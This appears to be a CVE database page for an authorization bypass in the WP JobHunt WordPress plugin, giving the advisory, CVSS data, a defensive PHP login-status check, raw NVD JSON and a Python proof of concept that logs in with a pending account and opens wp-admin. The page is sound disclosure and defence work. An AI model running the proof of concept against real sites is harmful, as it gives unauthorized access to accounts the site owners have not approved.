Security Vulnerability Report
CVE-2025-7374 CVSS 5.4 MEDIUM

CVE-2025-7374

Published: 2025-10-10 12:15:38
Last Modified: 2026-04-15 00:35:42

Description

The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to authorization bypass in all versions up to, and including, 7.6. This is due to insufficient login restrictions on inactive and pending accounts. This makes it possible for authenticated attackers, with Candidate- and Employer-level access and above, to log in to the site even if their account is inactive or pending.
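The root cause named above is an account-status check that is missing from the login path. Below is an added example of how a WordPress plugin can enforce account status at authentication time, written for this page and not taken from WP JobHunt (whose actual status storage and role slugs are not described here). The user-meta key `account_status` and the role slugs `candidate` and `employer` are assumptions used for illustration.

```php
<?php
/**
 * Added example: refuse login for inactive or pending accounts.
 *
 * Hooked to the core 'authenticate' filter at priority 30 so it runs after
 * WordPress has already verified the username and password (priority 20).
 * Illustration only; this is not WP JobHunt's implementation.
 */
add_filter( 'authenticate', 'example_block_inactive_accounts', 30, 3 );

function example_block_inactive_accounts( $user, $username, $password ) {
    // An earlier filter already rejected the login (wrong password, etc.)
    // or no user was resolved; pass that result through unchanged.
    if ( ! ( $user instanceof WP_User ) ) {
        return $user;
    }

    // Assumed role slugs for the accounts the plugin manages.
    // Administrators and other roles are deliberately left alone.
    $managed_roles = array( 'candidate', 'employer' );
    if ( ! array_intersect( $managed_roles, (array) $user->roles ) ) {
        return $user;
    }

    // Assumed: account state is stored in user meta under 'account_status'
    // with the values 'active', 'pending' or 'inactive'.
    $status = get_user_meta( $user->ID, 'account_status', true );

    // Fail closed: an empty or unknown value is treated like 'pending'.
    if ( 'active' !== $status ) {
        return new WP_Error(
            'account_not_active',
            __( 'Your account is not active yet. Please wait for approval or contact support.' )
        );
    }

    return $user;
}
```

Because the `authenticate` filter is applied by `wp_authenticate()`, the same check covers the wp-login.php form, XML-RPC and REST requests that authenticate with credentials. It does not revoke sessions that already exist, so a status change to inactive should also invalidate the user's current sessions, for example with `WP_Session_Tokens::get_instance( $user_id )->destroy_all()`.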

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP JobHunt plugin <= 7.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-7374 PoC - WP JobHunt Authorization Bypass
# This PoC demonstrates the authentication bypass for inactive/pending accounts
import requests

# Target configuration
TARGET_URL = "https://target-wordpress-site.com"
LOGIN_ENDPOINT = f"{TARGET_URL}/wp-login.php"

# Attacker credentials (registered but in pending/inactive state)
USERNAME = "attacker_candidate"
PASSWORD = "AttackerPass123!"

# Step 1: Attempt login with pending/inactive account credentials
session = requests.Session()

# First, get the login page to retrieve any necessary tokens/cookies
login_page = session.get(LOGIN_ENDPOINT)

# Step 2: Submit login credentials
login_data = {
    "log": USERNAME,
    "pwd": PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1",
}

# Set test cookie as required by WordPress
session.cookies.set("wordpress_test_cookie", "WP%20Cookie%20check")

# Step 3: Attempt authentication
response = session.post(LOGIN_ENDPOINT, data=login_data, allow_redirects=True)

# Step 4: Check if login was successful despite pending/inactive status
if "wp-admin" in response.url or "dashboard" in response.text.lower():
    print("[+] SUCCESS: Authorization bypass confirmed!")
    print(f"[+] Logged in as: {USERNAME}")
    print("[+] Account status bypassed: pending/inactive -> active")

    # Step 5: Access restricted resources
    dashboard = session.get(f"{TARGET_URL}/wp-admin/")
    print(f"[+] Dashboard accessible: {dashboard.status_code == 200}")
else:
    print("[-] Login failed - target may be patched")

# Note: The vulnerability exists because the WP JobHunt plugin
# fails to validate account status (active/inactive/pending)
# during the authentication process for Candidate and Employer roles.

References

https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636
https://www.wordfence.com/threat-intel/vulnerabilities/id/12643dd9-3b5e-45ea-9a64-a5b00c9202c8?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-7374",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-10T12:15:37.937",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to authorization bypass in all versions up to, and including, 7.6. This is due to insufficient login restrictions on inactive and pending accounts. This makes it possible for authenticated attackers, with Candidate- and Employer-level access and above, to log in to the site even if their account is inactive or pending."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/12643dd9-3b5e-45ea-9a64-a5b00c9202c8?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}